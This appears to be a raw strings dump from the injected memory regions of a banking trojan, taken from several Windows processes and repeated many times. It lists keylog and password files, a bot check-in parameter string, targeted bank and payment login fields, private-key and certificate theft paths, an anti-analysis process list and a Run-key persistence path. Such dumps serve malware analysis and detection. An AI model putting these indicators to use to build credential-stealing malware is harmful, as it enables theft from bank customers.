Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_824_rwx_00ED0000_00065000:

.text
`.rdata
@.data
.reloc
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
SYSTEM!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\rkousid.exe
C:\Windows\system32\config\systemprofile\AppData\Roaming\
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_864_rwx_01AE0000_00056000:

.text
`.data
.reloc
`.rdata
@.data
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer

svchost.exe_864_rwx_026F0000_00065000:


taskhost.exe_872_rwx_00580000_00056000:


taskhost.exe_872_rwx_00640000_00065000:


svchost.exe_1048_rwx_00720000_00056000:


svchost.exe_1048_rwx_00A90000_00065000:


svchost.exe_1156_rwx_00EF0000_00056000:


svchost.exe_1156_rwx_01260000_00065000:


svchost.exe_1280_rwx_005E0000_00056000:


svchost.exe_1280_rwx_00640000_00065000:


Dwm.exe_1376_rwx_007A0000_00056000:


Dwm.exe_1376_rwx_00860000_00065000:

GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
ADM!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\rkousid.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

Explorer.EXE_1440_rwx_03ED0000_00056000:

.text
`.data
.reloc
`.rdata
@.data
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

Explorer.EXE_1440_rwx_047C0000_00065000:

.text
`.rdata
@.data
.reloc
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
